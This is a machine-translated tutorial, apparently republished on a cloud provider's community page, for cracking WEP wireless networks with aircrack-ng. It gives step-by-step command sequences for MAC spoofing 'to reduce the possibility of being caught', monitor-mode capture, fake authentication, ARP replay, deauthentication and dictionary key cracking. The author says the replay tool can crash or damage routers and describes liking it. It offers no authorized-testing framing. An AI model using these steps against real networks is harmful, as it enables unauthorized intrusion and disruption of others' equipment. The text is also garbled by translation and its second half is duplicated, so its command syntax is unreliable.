Aircrack-ng tutorial

Source: Internet
Author: User
Tags network function bssid

Aircrack-ng tools are also available in Windows, but I can't capture packets in Windows, so I can only discard Windows from Linux, in addition, the APS scanned in Windows are much less than those in Linux. In fact, Windows does not fully support TCP/IP protocol families, and some protocols are not used for Windows directly to discard. The network was originally a Unix world from the beginning, and Windows was only later added to the network function.

The Aircrack-ng toolkit has many tools. I use the following tools:
Airmon-ng processing Nic Working Mode
Airodump-ng packet capture
Aircrack-ng cracking
Aireplay-ng packet sending, interference
The following linux commands are also used:
Ifconfig
Macchanger spoofs MAC
Iwconfig mainly targets wireless network adapter tools (same as ifconfig)
Iwlist for more information about Wireless Networks
There are other basic linux commands that I will not prompt.
Specific cracking steps:
1. Modify the wireless Nic status: dow first
2. Counterfeit the MAC address of the wireless network card: to ensure security, reduce the possibility of being caught.
3. Modify the NIC working mode: a virtual Nic is generated when the NIC enters the Monitor status.
4. Modify the wireless Nic status: up
5. view the network status, record the MAC of the AP and the MAC of the local machine, and determine the attack target.
6. Packet Capture: Generate. cap or. ivs
7. Interference with wireless networks: intercept wireless data packets and send spam data packets to obtain more valid data packets.
8. Crack. cap or. ivs, obtain the WEP password, and complete the cracking.


There are five Crack modes, which can be used as appropriate. The NIC may not be ath1 or wifi0 or ath0.
Ifconfig-
Ifconfig-a ath0 up
Airmon-ng start wifi0 6
Airodump-ng -- ivs-w target vroivivs file-c 6 ath1
Airodump-ng ath1
Aireplay-ng-1 0-e destination vrossid SSID-a destination MAC-h local MAC ath1
------------2 Crack Mode -----------
Aireplay-ng-2-p 0841-c ffffffffffff-B Target MAC-h local MAC ath1
------------3 Crack Mode -----------
Aireplay-ng-3-B Target MAC-h local MAC ath1
------------4 Crack Mode -----------
Aireplay-ng-4-B Target MAC-h local MAC ath1
Packetforge-ng-0-a target MAC-h local MAC-k running 255.255.255.255-l 255.255.255-y. xor-w MyArp
Aireplay-ng-2-r MyArp-x 256 ath1
------------5 Crack Mode -----------
Aireplay-ng-5-B Target MAC-h local MAC ath1
Packetforge-ng-0-a target MAC-h local MAC-k running 255.255.255.255-l 255.255.255-y. xor-w MyArp
Aireplay-ng-2-r MyArp-x 256 ath1
----------- Crack Key -----------
Aircrack-ng-n 64-B Target MAC destination vroivivs file-01.ivs

------------------------------

The following describes the basic usage of each command in detail (refer to the English description of the command)

1. ifconfig

Used to configure the NIC. Here we mainly used to disable and enable the NIC:

Ifconfig ath0 down

Ifconfig ath0 up

The purpose of disabling the NIC is to modify the MAC.

2. macchanger

This interface is used to change the MAC address of an Eni. The usage is as follows:

Usage: macchanger [options] device

-H Show Help

-V display version

-S: displays the current MAC

-E does not change the mac.

-A automatically generates a MAC of the same type.

-A automatically generates A different type of MAC.

-R generates any MAC

-L display the MAC Address Allocation of NICs of a known vendor. This is very useful. You can find out which vendor produces the product based on the MAC.

-M: Set a custom MAC such as macchanger -- mac = 00: 34: 00: 00: 00: 00 ath0.

3. airmon-ng

Enable the wireless Nic to enter the Monitor mode,

Useage: airmon-ng <start | stop | check> <interface> [channel]

<Start | stop | check> start, stop, and detect

<Interface> specify a wireless network card

[Channel] Listening channel. Most of the modern wireless routes are 6 by default. This channel is used for scanning at will, and network administrators should change the channel.

4. iwconfig

A dedicated wireless Nic Configuration tool used to configure special network information. The available network is displayed without parameters.

Useage: iwconfig interface [options]

[Essid {NN | ON | OFF}] Enable and disable essid

[Nwid {NN | on | off}] enable or disable the network ID

[Mode {managed | ad-hoc |...}] specifies the working mode/type of the wireless network.

[Freq N. NNNN [K | M | G] specifies the operating frequency

[Channel N] specified channel

[Ap {N | off | auto}] The specified AP number is disabled/automatically

[Sens N] sens No.

[Nick N] nick no.

[Rate {N | auto | fixed}] rate Control

[Rts {N | auto | fixed | off}] rts control. If you don't know what it is, go back and study the network.

[Frag {N | auto | fixed | off}] fragment Control

[Enc {NNNN-NNNN | off}] range

[Power {period N | timeout N}] power Supply frequency/timeout

[Retry {limit N | lifetime N}] retry limit/timeout

[Txpower N {mw | dBm}] power mw/DB

[Commit] Processing

5. iwlist

It is mainly used to display some additional information about the wireless network card.

Useage: iwlist [interface] options

Scanning Scan

Frequency

Channel

Bitrate

Rate

Encryption

Key

Power Supply

Txpower

Ap

Accespoints ap

Peers direct connection

Event

6. airodump-ng

The packet capture tool is my favorite. Its usage is as follows:

Usage: airodump-ng <options> <interface> [, <interface>,...]

Options:

-- Ivs: only saves the captured information as. ivs.

-- Gpsd: Use GPSd

-- Write <prefix>: Save as the name of the specified day file. I usually use this file, especially when multiple networks are specified.

-W: Same as -- write

-- Beacons: stores all beacons, which are discarded by default.

-- Update <secs>: displays the update delay.

-- Showack

-H: Hide known ones. Use them with the preceding options.

-F <msecs>: frequency hopping time

-- Berlin <secs>: the delay display time when no data packets are received, stop monitoring it. 120 seconds by default. it is recommended that you study English to read the original text, which may be different in translation. This is my understanding. (mhy_mhy note)

-R <file>: reads data packets from the specified file. I also want someone to give me a good idea of where to put the package.

Filter options:

-- Encrypt <suite>: uses the password sequence to filter the AP.

-- Netmask <netmask>: Filter an AP using a mask.

-- Bssid <bssid>: Use bssid to filter AP

-A: filter irrelevant clients.

By default, 2.4 Ghz is used. You can specify other frequencies by running the following command:

-- Channel <channels>: Specifies the channel

-- Band <abg>: bandwidth

-C <frequencies>: Specifies the frequency MHz.

-- Cswitch <method>: Set the channel switching mode.

0: FIFO (default) first-in-first-out (default)

1: Round Robin

2: Hop on last Hop

-S: Same as above

-- Help

7. aireplay-ng

Damage tools. Pay attention to the high lethality and even damage the inferior AP device (vrouters with small memory may be restarted or completely damaged). I like this very much, I believe you will also like it. Pay attention to the inch when using it.

Usage: aireplay-ng <options> <replay interface>

Filter options:

-B bssid: MAC of AP

-D dmac: Target MAC

-S smac: source MAC

-M len: minimum package Length

-N len: Maximum package Length

-U type: frame control, type field

-V subt: frame control, subtype field

-T tods: frame control, To DS bit

-F fromds: frame control, From DS bit

-W iswep: frame control, WEP bit

-D: Disable AP detection.

Replay options:

-X nbpps: number of packets per second

-P fctrl: frame setting (hex)

-A bssid: Set the mac address of the AP.

-C dmac: set the target MAC

-H smac: Set the source mac

-G value: Change the cache size (default value: 8)

-F: select the first matching package.

Fakeauth attack options:

-E essid: Set the SSID of the target AP.

-O npckts: Number of packages cracked per second (0 automatic, 1 by default)

-Q sec: survival time seconds

-Y prga: Sharing trusted key streams

ARP spoofing principle Replay attack options:

-J: injection of fromDS data packets. This option has not been used.

Fragmentation attack options:

-K IP: Set destination IP fragmentation

-L IP: Set Source IP fragmentation

Test attack options:

-B: Activate the bitrate test.

Source options:

-I iface: sets the packet capture interface device.

-R file: extract data packets from the pcap file

Attack modes (Numbers can still be used): attack mode, where the most lethal

-- Deauth count: Do not trust everything (-0)

-- Fakeauth delay: Trust in AP spoofing (-1)

-- Interactive: Interaction selection (-2)

-- Arpreplay: Standard ARP spoofing principle-request replay (-3)

-- Chopchop: decrypts the WEP package (-4)

-- Fragment: generate a valid key stream (-5)

-- Caffe-latte: Get the new IVs (-6) from the Client)

-- Cfrag: fragment attack on the client (-7)

-- Test: test the injection and effect (-9)

-- Help: Show this help. This part is all translated according to my use, but not completely accurate. It mainly deals with those who reference it without giving the author, and despise plagiarism.

8. aircrack-ng

The long process of cracking the KEY is not long. It depends on two aspects: first, the cleverness of the network management (whether a complicated password can be set), and second, the speed of the computer.

Usage: aircrack-ng [options] <. cap/. ivs file (s)>

Common options:

-A <amode>: Brute Force (1/WEP, 2/WPA-PSK)

-E <essid>: Select essid as the target.

-B <bssid>: select the mac address of the ap as the target, which is the key word for Cracking Recognition.

-Q: Quiet Mode, countless outbound Modes

-C <macs>: combines all APs into a virtual

�� Static WEP cracking options:

-C: Only search for letters and numbers

-T: Only Binary Search

-H: Search For numeric keywords (used for the broken part ).

-D <mask>: Specifies the mask (A1: XX: CF: YY)

-M <maddr>: match available data packets with MAC

-N <nbits>: WEP length: 64/128/152/256/512

-I <index>: WEP index (1 to 4), default: any

-F <fudge>: the default strength of brute-force cracking is 2. The original Article literally means "the beast forces the creation of facts ".

-K <korek>: disables a cracking method (1 to 17)

-X or-x0: Disable the latest keyword brute force cracking.

-X1: use the latest keyword to crack the default

-X2: use the latest two bytes for brute-force cracking

-Y: Single-thread mode of the experiment

-K: KoreK attack (pre-PTW)

-S: displayed as ASCII

-M <num>: Maximum number of ivs used

-D: WEP non-concealed Mode

-P <num>: PTW debug: 1 disable Klein, 2 PTW

-1: Try PTW once

WEP and WPA-PSK cracking options:

-W <words>: Specifies multiple directory files.

-R <DB>: Specifies the airolib-ng database, which cannot be used with-w.

-- Help: displays the help

Perform the following operations with my hardware instance:

My hardware is a/B/g wireless network card of atheros, which is displayed as ath0 in linux. I only list the common command steps and do not explain them any more:

Ifconfig ath0 down

Macchanger-r ath0

Macchanger-r wifi0

Ifconfig ath1 up

Airmon-ng start ath1 6

Iwconfig ath1

Iwlist ath1 scanning

Airodump-ng-w *. cap-c 6 ath1

Aireplay-ng-1 0-e ap_essid-a ap_mac-h XXXXXXXXXX ath1 aireplay-ng-5-B ap_mac-h XXXXXXXXXX ath1

Aireplay-ng-3-B ap_mac-h XXXXXXXXXX-x 1024 ath1

Aireplay-ng-0 1-a 00: 00: 00: 00: 00-c BB: BB ath1

Aireplay-ng-3-B <ap mac>-h <my MAC>-I ath1

Aircrack-ng-x-f 2 *. cap

Aircrack-ng-w passdict.txt *. cap

Aircrack-ng-n 64-B apmac *. ivs

 

The following describes the basic usage of each command in detail (refer to the English description of the command)

1. ifconfig

Used to configure the NIC. Here we mainly used to disable and enable the NIC:

Ifconfig ath0 down

Ifconfig ath0 up

The purpose of disabling the NIC is to modify the MAC.

2. macchanger

This interface is used to change the MAC address of an Eni. The usage is as follows:

Usage: macchanger [options] device

-H Show Help

-V display version

-S: displays the current MAC

-E does not change the mac.

-A automatically generates a MAC of the same type.

-A automatically generates A different type of MAC.

-R generates any MAC

-L display the MAC Address Allocation of NICs of a known vendor. This is very useful. You can find out which vendor produces the product based on the MAC.

-M: Set a custom MAC such as macchanger -- mac = 00: 34: 00: 00: 00: 00 ath0.

3. airmon-ng

Enable the wireless Nic to enter the Monitor mode,

Useage: airmon-ng <start | stop | check> <interface> [channel]

<Start | stop | check> start, stop, and detect

<Interface> specify a wireless network card

[Channel] Listening channel. Most of the modern wireless routes are 6 by default. This channel is used for scanning at will, and network administrators should change the channel.

4. iwconfig

A dedicated wireless Nic Configuration tool used to configure special network information. The available network is displayed without parameters.

Useage: iwconfig interface [options]

[Essid {NN | ON | OFF}] Enable and disable essid

[Nwid {NN | on | off}] enable or disable the network ID

[Mode {managed | ad-hoc |...}] specifies the working mode/type of the wireless network.

[Freq N. NNNN [K | M | G] specifies the operating frequency

[Channel N] specified channel

[Ap {N | off | auto}] The specified AP number is disabled/automatically

[Sens N] sens No.

[Nick N] nick no.

[Rate {N | auto | fixed}] rate Control

[Rts {N | auto | fixed | off}] rts control. If you don't know what it is, go back and study the network.

[Frag {N | auto | fixed | off}] fragment Control

[Enc {NNNN-NNNN | off}] range

[Power {period N | timeout N}] power Supply frequency/timeout

[Retry {limit N | lifetime N}] retry limit/timeout

[Txpower N {mw | dBm}] power mw/DB

[Commit] Processing

5. iwlist

It is mainly used to display some additional information about the wireless network card.

Useage: iwlist [interface] options

Scanning Scan

Frequency

Channel

Bitrate

Rate

Encryption

Key

Power Supply

Txpower

Ap

Accespoints ap

Peers direct connection

Event

6. airodump-ng

The packet capture tool is my favorite. Its usage is as follows:

Usage: airodump-ng <options> <interface> [, <interface>,...]

Options:

-- Ivs: only saves the captured information as. ivs.

-- Gpsd: Use GPSd

-- Write <prefix>: Save as the name of the specified day file. I usually use this file, especially when multiple networks are specified.

-W: Same as -- write

-- Beacons: stores all beacons, which are discarded by default.

-- Update <secs>: displays the update delay.

-- Showack

-H: Hide known ones. Use them with the preceding options.

-F <msecs>: frequency hopping time

-- Berlin <secs>: the delay display time when no data packets are received, stop monitoring it. 120 seconds by default. it is recommended that you study English to read the original text, which may be different in translation. This is my understanding. (mhy_mhy note)

-R <file>: reads data packets from the specified file. I also want someone to give me a good idea of where to put the package.

Filter options:

-- Encrypt <suite>: uses the password sequence to filter the AP.

-- Netmask <netmask>: Filter an AP using a mask.

-- Bssid <bssid>: Use bssid to filter AP

-A: filter irrelevant clients.

By default, 2.4 Ghz is used. You can specify other frequencies by running the following command:

-- Channel <channels>: Specifies the channel

-- Band <abg>: bandwidth

-C <frequencies>: Specifies the frequency MHz.

-- Cswitch <method>: Set the channel switching mode.

0: FIFO (default) first-in-first-out (default)

1: Round Robin

2: Hop on last Hop

-S: Same as above

-- Help

7. aireplay-ng

Damage tools. Pay attention to the high lethality and even damage the inferior AP device (vrouters with small memory may be restarted or completely damaged). I like this very much, I believe you will also like it. Pay attention to the inch when using it.

Usage: aireplay-ng <options> <replay interface>

Filter options:

-B bssid: MAC of AP

-D dmac: Target MAC

-S smac: source MAC

-M len: minimum package Length

-N len: Maximum package Length

-U type: frame control, type field

-V subt: frame control, subtype field

-T tods: frame control, To DS bit

-F fromds: frame control, From DS bit

-W iswep: frame control, WEP bit

-D: Disable AP detection.

Replay options:

-X nbpps: number of packets per second

-P fctrl: frame setting (hex)

-A bssid: Set the mac address of the AP.

-C dmac: set the target MAC

-H smac: Set the source mac

-G value: Change the cache size (default value: 8)

-F: select the first matching package.

Fakeauth attack options:

-E essid: Set the SSID of the target AP.

-O npckts: Number of packages cracked per second (0 automatic, 1 by default)

-Q sec: survival time seconds

-Y prga: Sharing trusted key streams

ARP spoofing principle Replay attack options:

-J: injection of fromDS data packets. This option has not been used.

Fragmentation attack options:

-K IP: Set destination IP fragmentation

-L IP: Set Source IP fragmentation

Test attack options:

-B: Activate the bitrate test.

Source options:

-I iface: sets the packet capture interface device.

-R file: extract data packets from the pcap file

Attack modes (Numbers can still be used): attack mode, where the most lethal

-- Deauth count: Do not trust everything (-0)

-- Fakeauth delay: Trust in AP spoofing (-1)

-- Interactive: Interaction selection (-2)

-- Arpreplay: Standard ARP spoofing principle-request replay (-3)

-- Chopchop: decrypts the WEP package (-4)

-- Fragment: generate a valid key stream (-5)

-- Caffe-latte: Get the new IVs (-6) from the Client)

-- Cfrag: fragment attack on the client (-7)

-- Test: test the injection and effect (-9)

-- Help: Show this help. This part is all translated according to my use, but not completely accurate. It mainly deals with those who reference it without giving the author, and despise plagiarism.

8. aircrack-ng

The long process of cracking the KEY is not long. It depends on two aspects: first, the cleverness of the network management (whether a complicated password can be set), and second, the speed of the computer.

Usage: aircrack-ng [options] <. cap/. ivs file (s)>

Common options:

-A <amode>: Brute Force (1/WEP, 2/WPA-PSK)

-E <essid>: Select essid as the target.

-B <bssid>: select the mac address of the ap as the target, which is the key word for Cracking Recognition.

-Q: Quiet Mode, countless outbound Modes

-C <macs>: combines all APs into a virtual

Static WEP cracking options:

-C: Only search for letters and numbers

-T: Only Binary Search

-H: Search For numeric keywords (used for the broken part ).

-D <mask>: Specifies the mask (A1: XX: CF: YY)

-M <maddr>: match available data packets with MAC

-N <nbits>: WEP length: 64/128/152/256/512

-I <index>: WEP index (1 to 4), default: any

-F <fudge>: the default strength of brute-force cracking is 2. The original Article literally means "the beast forces the creation of facts ".

-K <korek>: disables a cracking method (1 to 17)

-X or-x0: Disable the latest keyword brute force cracking.

-X1: use the latest keyword to crack the default

-X2: use the latest two bytes for brute-force cracking

-Y: Single-thread mode of the experiment

-K: KoreK attack (pre-PTW)

-S: displayed as ASCII

-M <num>: Maximum number of ivs used

-D: WEP non-concealed Mode

-P <num>: PTW debug: 1 disable Klein, 2 PTW

-1: Try PTW once

WEP and WPA-PSK cracking options:

-W <words>: Specifies multiple directory files.

-R <DB>: Specifies the airolib-ng database, which cannot be used with-w.

-- Help: displays the help

Perform the following operations with my hardware instance:

My hardware is a/B/g wireless network card of atheros, which is displayed as ath0 in linux. I only list the common command steps and do not explain them any more:

Ifconfig ath0 down

Macchanger-r ath0

Macchanger-r wifi0

Ifconfig ath1 up

Airmon-ng start ath1 6

Iwconfig ath1

Iwlist ath1 scanning

Airodump-ng-w *. cap-c 6 ath1

Aireplay-ng-1 0-e ap_essid-a ap_mac-h XXXXXXXXXX ath1 aireplay-ng-5-B ap_mac-h XXXXXXXXXX ath1

Aireplay-ng-3-B ap_mac-h XXXXXXXXXX-x 1024 ath1

Aireplay-ng-0 1-a 00: 00: 00: 00: 00-c BB: BB ath1

Aireplay-ng-3-B <ap mac>-h <my MAC>-I ath1

Aircrack-ng-x-f 2 *. cap

Aircrack-ng-w passdict.txt *. cap

Aircrack-ng-n 64-B apmac *. ivs

For more information about Aircrack-ng, click here.
Aircrack-ng: click here

Install the latest Reaver and aircrack-ng wireless network cracking tools in Ubuntu 12.04

Ubuntu Linux wireless password cracking tool Aircrack-ng

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.